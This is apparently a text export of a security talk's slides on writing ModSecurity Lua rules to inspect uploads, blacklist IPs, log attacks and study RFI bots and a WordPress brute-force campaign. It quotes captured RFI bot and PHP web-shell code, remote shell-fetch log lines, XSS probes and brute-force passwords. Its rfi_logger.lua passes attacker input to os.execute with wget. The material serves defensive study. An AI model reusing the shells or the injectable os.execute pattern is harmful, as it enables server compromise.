    © 2012 Using @inspectFile SecRuleFILES_TMPNAMES “@inspectFile file_inspector.lua” deny
  • 22.
    © 2012 Example script(AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
  • 23.
    © 2012 Example script(AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
  • 24.
    © 2012 Example script(AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
  • 25.
    © 2012 Example script(AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
  • 26.
    © 2012 SpiderLabs makingit awesome • Implemented their own AV detection using ClamAV • It’s in the spiderlabs github • https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/ runav.pl
  • 27.
    © 2012 Matching WithScripts SecRuleScript “check_blacklist.lua” deny
  • 28.
    © 2012 Matching WithScripts SecRuleScript “check_blacklist.lua” deny --- check_blacklist.lua --- function main() local ip = m.getvar('REMOTE_ADDR') for line in io.lines("blacklist.txt") do if string.match(ip, line) then return 1 end end end
  • 29.
    © 2012 Matching WithScripts SecRule REQUEST_URI “admin” deny,chain SecRuleScript “check_blacklist.lua” --- check_blacklist.lua --- function main() local ip = m.getvar('REMOTE_ADDR') for line in io.lines("blacklist.txt") do if string.match(ip, line) then return 1 end end end
  • 30.
    © 2012 SpiderLabs makingit awesome #2 “ipMatchFromFile” implemented in release 2.7 SecRule REQUEST_URI “admin” deny,chain SecRule ‘@ipMatchFromFile blacklist.txt’
  • 31.
  • 32.
    © 2012 RFI Hunting 192.168.69.101- - [08/Oct/2012:11:19:27 -0700] "GET /thumb.php?src=http://site.com/shell.txt HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Trivial to pull from logs
  • 33.
    © 2012 RFI Hunting 192.168.69.101- - [08/Oct/2012:11:12:43 -0700] "POST /thumb.php HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Problem …
  • 34.
    © 2012 rfi_logger.lua SecRule ARGS“^http://” allow,exec:rfi_logger.lua function main() local ip = m.getvar("REMOTE_ADDR") local url = m.getvar("REQUEST_URI") local args = m.getvars("ARGS") for j = 1, #args do if(string.match(args[j].value, 'http')) then fh = io.open("/tmp/backdoor", "a") fh:write("---"..ip.." "..url.." "..args[j].name.."="..args[j].value.."---n") fh:close() os.execute("wget –q –x -P /tmp/rfi_files/ '"..args[j].value) end end end
  • 35.
    © 2012 <?php ###[ SEMBONCrEw SPREAD for RFIBot (2.3) ]### error_reporting(0); ##### CONFIG ##### $mode = $_GET["mode"]; $url = 'http://www.web-faq.jp/click_counter/data/.data/'; //URL path $src = $url.'cmd'; //Source Shell $shell = '404.php'; //Backdoor PHPShell name $bot = $url.'bot'; //Source PHPBot ##### SPREAD ##### ... die(base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Failed!'); //encode biar lebih optimal! } ... It works
  • 36.
    © 2012 <html><head><title>/// ResponseCMD ///</title></head><body bgcolor=DC143C> <H1>Changing this CMD will result in corrupt scanning !</H1> </html></head></body> <?php ... function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } ... It works
  • 37.
    © 2012 Better thana blacklist 1) Capture Request 2) Log IP Malicious Request WAF script
  • 38.
    © 2012 Better thana blacklist Request WAF script Unobstructed Response 1) Capture Request 2) Log All Data Malicious Host Unknown Host
  • 39.
    © 2012 Put ittogether SecRule REQUEST_HEADERS:User-Agent “<? php” deny,status:200,exec:blacklist_ip.lua SecRule ‘@ipMatchFromFile blacklist.txt’ deny,status:200,exec:uber_logger.lua
  • 40.
    © 2012 Put ittogether SecRule REQUEST_HEADERS:User-Agent “<? php” deny,status:200,exec:blacklist_ip.lua --- blacklist_ip.lua --- function main() local ip = m.getvar("REMOTE_ADDR") fh = io.open("blacklist.txt", "a") fh:write(ip.."n") fh:close() end
  • 41.
    © 2012 Put ittogether SecRule ‘@ipMatchFromFile blacklist.txt’ deny,status:200,exec:uber_logger.lua --- uber_logger.lua --- function main() local ip = m.getvar("REMOTE_ADDR") local url = m.getvar("REQUEST_URI") local args = m.getvars("ARGS") local headers = m.getvars("REQUEST_HEADERS") local logstring = " " for j = 1, #headers do logstring = logstring.." "..headers[j].name.."="..headers[j].value end for j = 1, #args do logstring = logstring.." "..args[j].name.."="..args[j].value end fh = io.open("/tmp/uberlog", "a+") fh:write(ip.." "..url.." "..logstring.."n") fh:close() end
  • 42.
    © 2012 Put ittogether Uberlog data 69.110.217.76 /index.php?arg=<script>alert(1);</script> REQUEST_HEADERS:User-Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:arg=<script>alert(1);</script> 69.110.217.76 /index.php?-s REQUEST_HEADERS:User- Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:-s=
  • 43.
    © 2012 Data Mining Captureonly on malicious requests Log far more data – REQUEST_HEADERS – POST variables – COOKIE data – FILES uploaded in the request – GeoIP information – Live data on the attack – Make pretty* graphs * OK they are not that pretty
  • 44.
  • 45.
  • 46.
  • 47.
    © 2012 The WordPressIncident (Monitoring Brute Force Attacks) “Massive” WordPress attack in early April 2013. Reported by several Hosting providers as reason for outages. A Mr. Brian K. blogged that it was a botnet recruiting run. Coincidentally: I had been monitoring wp-login.php requests with full data for months.
  • 48.
    © 2012 The WordPressIncident (Why was I logging?) Someone* complained on twitter** Their logs looked like this: POST wp-login.php POST wp-login.php POST wp-login.php POST wp-login.php POST wp-login.php They wanted to know more. * it was @Viss ** First time ever that complaining on twitter was beneficial, but not to the complainer.
  • 49.
    © 2012 The WordPressIncident (Script I re-used) I decided to put the “ueberlogger.lua” script to work. SecRule REQUEST_URI wp-login.php allow,exec:uberlogger.lua
  • 50.
    © 2012 The WordPressIncident (Script I re-used) I decided to put the “ueberlogger.lua” script to work. SecRule REQUEST_URI wp-login.php allow,exec:uberlogger.lua x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=1admin x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=admins x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=webmaster x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=password x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=111111 x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=naruto
  • 51.
    © 2012 The WordPressIncident (Data I got) Password list of the brute force Frequency of attacks against sites I controlled Passwords naruto pokemon 123456 admin Sitename123 etc... Correlated with the data from other researchers
  • 52.
    © 2012 The WordPressIncident (My Perspective) ● It was a brute force, but a lame one. ● It got press because hosts were going down. ● Evidence that WP auth mechanisms can cause DoS. ● WordPress is a buzzword for security press ● Read my article all about WP auth on the blog.spiderlabs.com :).
  • 53.
    © 2012 The WordPressIncident (My Perspective) ● It was a brute force, but a lame one. ● It got press because hosts were going down. ● Evidence that WP auth mechanisms can cause DoS. ● WordPress is a buzzword for security press ● Read my article all about WP auth on the blog.spiderlabs.com :).
  • 54.